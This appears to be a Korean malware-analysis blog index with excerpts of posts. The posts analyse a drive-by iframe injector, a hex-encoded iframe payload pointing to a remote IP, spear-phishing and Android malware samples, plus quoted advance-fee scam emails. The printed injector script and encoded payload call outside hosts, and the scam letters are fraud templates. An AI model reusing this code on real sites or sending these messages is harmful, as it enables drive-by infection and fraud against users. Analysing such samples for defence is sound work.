일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 |
- CryptoJS
- intelmac
- Malware Sample
- react
- self-signed
- XSS
- 많다..
- 네이버카페
- 거래사기
- 척추관협착증
- Frida
- speed-measure-webpack-plugin
- 로맨스스캠
- 변태는
- open redirect
- 허리디스크
- Sequoia
- NUGU
- CJ대한통운 #쿠팡 #통관번호오류 #통관고유번호오류 #안주원팀장 #모건인베스트
- 모의해킹
- ue4dumper
- 중고나라
- shell_gpt
- MongoDB #NoSQL #CreateUser #DropUser #mongod #mognod.conf
- 채팅환전사기
- 보이스피싱 #대검찰청 #명의도용 #비밀번호 #계좌번호 #공공기관 #가짜검찰청
- 안전결제
- ssrf
- esbuild
- 취약점
- Today
- Total
목록분석생활 (82)
annyoung
This Page Unable을 출력해준다. 누가 보면 정말 페이지 사용 못하는 줄 알겠다.. function gxr09() { var static='ajax'; var controller='index.php'; var gxr = document.createElement('iframe'); gxr.src = 'http://flintys.nl/count.php'; gxr.style.position = 'absolute'; gxr.style.color = '84119'; gxr.style.height = '84119px'; gxr.style.width = '84119px'; gxr.style.left = '100084119'; gxr.style.top = '100084119'; if (!document.ge..
보호되어 있는 글입니다.
Hi park jeong hee, Following my last message, I am sending you a detailed email message so that you will understand more about me and the transaction and to know what your roles are on this transaction. However, I must thank you for responding to my message about you working with me as a team on this financial transaction that requires utmost secret from both of us in order to ensure successful ..
-- Hi, My name is Mr. Bill Jackson, Bank director here in London. There is a sum of 45 Million dollars deposited since 2005 by late Mr. Bong-Woo Park from Korea. I have tried to trace any member of his family so that they will come and claim this money but I could not locate his family members. According to the British Law, if the account remain dormant for a complete period of ten years, the mo..
불과 몇 시간전, 샘플을 입수해서 분석하기로 결정하고 분석해봤다.5분? 정도 봤는데 25번 포트로 통신하는거보니 SMTP라고 생각했고 정보유출에 핵심을 두고 분석하였다.이메일이 삭제되어 정확히 드랍된 파일인지, 숙주인지 모르겠다. 그냥 분석 해보려고 한다. FileName axoleoyt.exe MD5 D555F23D6B5C902C7455A9FC9EF5FDB7 SHA-1 7D7B35177D2E9A872133247C40360FF197FF4A9C Packer X 파일명을 보니 아마도 랜덤으로 생성 되었고, 드랍된 파일로 추정된다. .rdata:0040DA64 00000011 C Inter your Name:.rdata:0040DA78 00000011 C Inter your mail: 해당 바이너리의 스트링을..
보호되어 있는 글입니다.
단축 URL과 개인서버를 사용하여 유포중이다.bit.ly/1QjzEjT 캡챠를 사용하여 자동 크롤링 방지 FileName com.spo.plus.plus.apk MD5 82A7B070E5F7DA62297B7F7448BC5C51 SHA-1 FBF45A32D4B50169C6E5BA6547CA13E8CCB0C862 Packer X드랍되는 어플리케이션은 위의 정보와 같다. 패킹도 안되어 있고 거의 기본으로 되어 있는 귀여운 어플리케이션이다. public class AppContext extends Application{ public static final String BASEDIR = Environment.getExternalStorageDirectory().toString() + "/Download"; pub..
고운빛 베이비시터 사이트에서 iframe을 사용하여 몰래 유포 중이다. 코드 더럽게 길네.. hex로 인코딩되어 복호화 하게 된다.복호화 하는 방법은 대체적으로 간단하다. >>> hexList = ['\x66\x61\x6b\x65\x3d','\x66\x61\x6b\x65\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x32\x31\x31\x2e\x35\x38\x2e\x32\x35\x35\x2e\x32\x31\x39\x2f\x75\x73\x61\x2f\x6d\x79\x67..
이메일을 통해서 첨부된 악성코드(흔히 말하는 기업에서의 스피어 피싱)를 분석하려고 한다. 샘플 수집의 경로는 몇 일전 TLS callback에 대해서 물어봐주셨던 분에게 메일을 통해서 받았다. FileName fax_info.exe MD5 99750A17CF9141BB10BD537BEC0A2DB0 SHA-1 7F16CB193145C69D49C19F4CEA08134AC8862CDD Packer X 압축을 사용하여 1차적으로 백신 우회를 하였고, pdf icon으로 위장하여 피해자가 실행하게 끔 된 바이너리다. IAT만 봐도 작은 기능을 제외하고 큰 기능을 먼저 보자면 원격제어 기능을 가지고 있는 악성코드라는 것을 알 수 있다. 이유는 다음 내용에 설명하겠다. void *__stdcall sub_401560..
한 3일전부터 8080포트로 운영하고 있는 웹서버 인데, 귀여운 로그가 찍혔다. 80.98.171.*** - - [27/May/2015:17:19:49 +0900] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 222Ringing at your doorbell!! 80.98.171.*** - - [27/May/2015:17:19:52 +0900] "GET /Diagnostics.asp HTTP/1.0" 404 213 그리고 내 서버는 apache+php인데 asp로 접근하다니.. 무튼 귀여운 헝가리 친구였다.